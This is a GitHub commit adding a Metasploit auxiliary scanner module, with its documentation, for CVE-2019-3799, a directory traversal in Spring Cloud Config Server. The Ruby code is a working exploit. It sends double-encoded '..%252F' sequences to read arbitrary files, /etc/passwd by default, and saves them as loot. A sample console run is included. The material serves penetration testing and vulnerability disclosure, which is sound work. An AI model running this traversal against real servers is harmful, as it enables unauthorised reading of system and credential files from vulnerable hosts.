Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #11745, Add spring-cloud-config-server dir traversal
- Loading branch information
Showing
2 changed files
with
106 additions
and
0 deletions.
There are no files selected for viewing
35 changes: 35 additions & 0 deletions
35
documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
## Description | ||
|
||
This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. | ||
Spring Cloud Config listens by default on port 8888. | ||
|
||
### Vulnerable Application | ||
|
||
* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip | ||
|
||
## Verification | ||
|
||
1. `./msfconsole` | ||
2. `use auxiliary/scanner/http/springcloud_traversal` | ||
3. `set rhosts <rhost>` | ||
4. `run` | ||
|
||
## Scenarios | ||
|
||
### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux | ||
|
||
``` | ||
msf > use auxiliary/scanner/http/springcloud_traversal | ||
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132 | ||
RHOSTS => 192.168.1.132 | ||
msf auxiliary(scanner/http/springcloud_traversal) > run | ||
[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt | ||
[*] Scanned 1 of 1 hosts (100% complete) | ||
[*] Auxiliary module execution completed | ||
msf auxiliary(scanner/http/springcloud_traversal) > | ||
``` | ||
|
||
## References | ||
|
||
* https://pivotal.io/security/cve-2019-3799 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Auxiliary::Report | ||
include Msf::Auxiliary::Scanner | ||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Spring Cloud Config Server Directory Traversal', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated directory traversal vulnerability | ||
which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2, | ||
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring | ||
Cloud Config listens by default on port 8888. | ||
}, | ||
'References' => | ||
[ | ||
['CVE', '2019-3799'], | ||
['URL', 'https://pivotal.io/security/cve-2019-3799'] | ||
], | ||
'Author' => | ||
[ | ||
'Vern', # Vulnerability discovery | ||
'Dhiraj Mishra' # Metasploit module | ||
], | ||
'DisclosureDate' => '2019-04-17', | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
register_options( | ||
[ | ||
Opt::RPORT(8888), | ||
OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']), | ||
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) | ||
]) | ||
end | ||
|
||
def data | ||
Rex::Text.rand_text_alpha(3..8) | ||
end | ||
|
||
def run_host(ip) | ||
filename = datastore['FILEPATH'] | ||
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}" | ||
uri = "/#{data}/#{data}/master/#{traversal}" | ||
|
||
res = send_request_raw({ | ||
'method' => 'GET', | ||
'uri' => uri | ||
}) | ||
|
||
unless res && res.code == 200 | ||
print_error('Nothing was downloaded') | ||
return | ||
end | ||
|
||
vprint_good("#{peer} - #{res.body}") | ||
path = store_loot( | ||
'springcloud.traversal', | ||
'text/plain', | ||
ip, | ||
res.body, | ||
filename | ||
) | ||
print_good("File saved in: #{path}") | ||
end | ||
end |